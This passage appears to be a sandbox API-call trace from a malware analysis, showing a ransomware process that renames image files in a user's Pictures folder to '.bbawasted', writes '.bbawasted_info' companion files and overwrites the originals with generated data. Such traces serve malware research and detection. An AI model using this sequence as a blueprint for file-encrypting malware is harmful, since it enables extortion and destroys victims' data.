(hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.775] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\t2LC3lvZ7QlnyYbh.png") returned 73 [0074.775] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x29c) returned 0x5be908 [0074.775] lstrcpyW (in: lpString1=0x5be99a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.775] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0074.775] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.776] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0074.776] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.776] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\t2LC3lvZ7QlnyYbh.png.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz-ax5agv\\t2lc3lvz7qlnyybh.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.776] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.777] SetEndOfFile (hFile=0x11c) returned 1 [0074.777] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.777] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.777] lstrcpyW (in: lpString1=0x5be99a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.777] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\t2LC3lvZ7QlnyYbh.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz-ax5agv\\t2lc3lvz7qlnyybh.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\t2LC3lvZ7QlnyYbh.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz-ax5agv\\t2lc3lvz7qlnyybh.png.bbawasted")) returned 1 [0074.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\t2LC3lvZ7QlnyYbh.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz-ax5agv\\t2lc3lvz7qlnyybh.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0074.778] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0074.780] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0074.780] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0074.780] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0074.780] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0074.781] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.781] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0074.791] SetEndOfFile (hFile=0x11c) returned 1 [0074.793] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.793] CloseHandle (hObject=0x11c) returned 1 [0074.795] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5be908 | out: hHeap=0x580000) returned 1 [0074.795] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.796] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.796] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.796] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\v5fPkLDSEwSYQ.gif") returned 70 [0074.796] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x296) returned 0x5be908 [0074.796] lstrcpyW (in: lpString1=0x5be994, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.796] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0074.796] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.797] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0074.797] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\v5fPkLDSEwSYQ.gif.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz-ax5agv\\v5fpkldsewsyq.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.797] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.798] SetEndOfFile (hFile=0x11c) returned 1 [0074.799] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.799] lstrcpyW (in: lpString1=0x5be994, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.799] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\v5fPkLDSEwSYQ.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz-ax5agv\\v5fpkldsewsyq.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\v5fPkLDSEwSYQ.gif.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz-ax5agv\\v5fpkldsewsyq.gif.bbawasted")) returned 1 [0074.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\v5fPkLDSEwSYQ.gif.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz-ax5agv\\v5fpkldsewsyq.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0074.800] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0074.801] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0074.802] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0074.802] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0074.802] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0074.803] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.803] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0074.812] SetEndOfFile (hFile=0x11c) returned 1 [0074.815] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.815] CloseHandle (hObject=0x11c) returned 1 [0074.817] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5be908 | out: hHeap=0x580000) returned 1 [0074.817] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.818] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.818] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.818] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\xJmd-CsvI4a02Oa.gif") returned 72 [0074.818] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x29a) returned 0x5be908 [0074.818] lstrcpyW (in: lpString1=0x5be998, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.818] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0074.818] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.819] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0074.819] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\xJmd-CsvI4a02Oa.gif.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz-ax5agv\\xjmd-csvi4a02oa.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.819] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.867] SetEndOfFile (hFile=0x11c) returned 1 [0074.867] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.867] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.867] lstrcpyW (in: lpString1=0x5be998, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.868] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\xJmd-CsvI4a02Oa.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz-ax5agv\\xjmd-csvi4a02oa.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\xJmd-CsvI4a02Oa.gif.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz-ax5agv\\xjmd-csvi4a02oa.gif.bbawasted")) returned 1 [0074.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\xJmd-CsvI4a02Oa.gif.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bz-ax5agv\\xjmd-csvi4a02oa.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0074.868] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0074.869] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0074.870] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0074.870] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0074.870] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0074.870] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.870] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0074.879] SetEndOfFile (hFile=0x11c) returned 1 [0074.881] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.881] CloseHandle (hObject=0x11c) returned 1 [0074.882] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5be908 | out: hHeap=0x580000) returned 1 [0074.882] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.883] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.883] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.883] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KNZJI_xMGs27xUv87D.png") returned 65 [0074.883] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28c) returned 0x5be908 [0074.883] lstrcpyW (in: lpString1=0x5be98a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.883] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0074.883] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.884] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0074.884] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KNZJI_xMGs27xUv87D.png.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\knzji_xmgs27xuv87d.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.885] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.886] SetEndOfFile (hFile=0x11c) returned 1 [0074.886] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.886] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.886] lstrcpyW (in: lpString1=0x5be98a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.886] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KNZJI_xMGs27xUv87D.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\knzji_xmgs27xuv87d.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KNZJI_xMGs27xUv87D.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\knzji_xmgs27xuv87d.png.bbawasted")) returned 1 [0074.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KNZJI_xMGs27xUv87D.png.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\knzji_xmgs27xuv87d.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0074.887] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0074.889] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0074.890] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0074.890] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0074.890] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0074.890] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.891] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0074.899] SetEndOfFile (hFile=0x11c) returned 1 [0074.977] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.977] CloseHandle (hObject=0x11c) returned 1 [0074.979] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5be908 | out: hHeap=0x580000) returned 1 [0074.979] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.980] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.980] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.980] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\419BxLjKLP6qw8.gif") returned 94 [0074.980] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2c6) returned 0x5bf070 [0074.980] lstrcpyW (in: lpString1=0x5bf12c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.980] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0074.980] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.981] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0074.981] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.981] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\419BxLjKLP6qw8.gif.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\419bxljklp6qw8.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.981] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.982] SetEndOfFile (hFile=0x11c) returned 1 [0074.982] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.983] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.983] lstrcpyW (in: lpString1=0x5bf12c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.983] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\419BxLjKLP6qw8.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\419bxljklp6qw8.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\419BxLjKLP6qw8.gif.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\419bxljklp6qw8.gif.bbawasted")) returned 1 [0074.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\419BxLjKLP6qw8.gif.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\419bxljklp6qw8.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0074.983] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0074.985] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0074.986] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0074.986] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0074.986] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0074.987] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.987] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0074.995] SetEndOfFile (hFile=0x11c) returned 1 [0074.997] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.997] CloseHandle (hObject=0x11c) returned 1 [0074.999] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0074.999] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.999] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0075.000] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.000] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\DFwLBzCCb9\\6rvX.bmp") returned 95 [0075.000] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2c8) returned 0x5bf070 [0075.000] lstrcpyW (in: lpString1=0x5bf12e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0075.000] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0075.000] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0075.000] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0075.000] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0075.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\DFwLBzCCb9\\6rvX.bmp.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l15fgmoaxhj4\\h1fuipg2l9xeaaujxba\\dfwlbzccb9\\6rvx.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0075.001] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0075.002] SetEndOfFile (hFile=0x11c) returned 1 [0075.002] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.002] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0075.002] lstrcpyW (in: lpString1=0x5bf12e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0075.002] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\DFwLBzCCb9\\6rvX.bmp" (normalized: "c:\\users\\5p5nrgjn0js 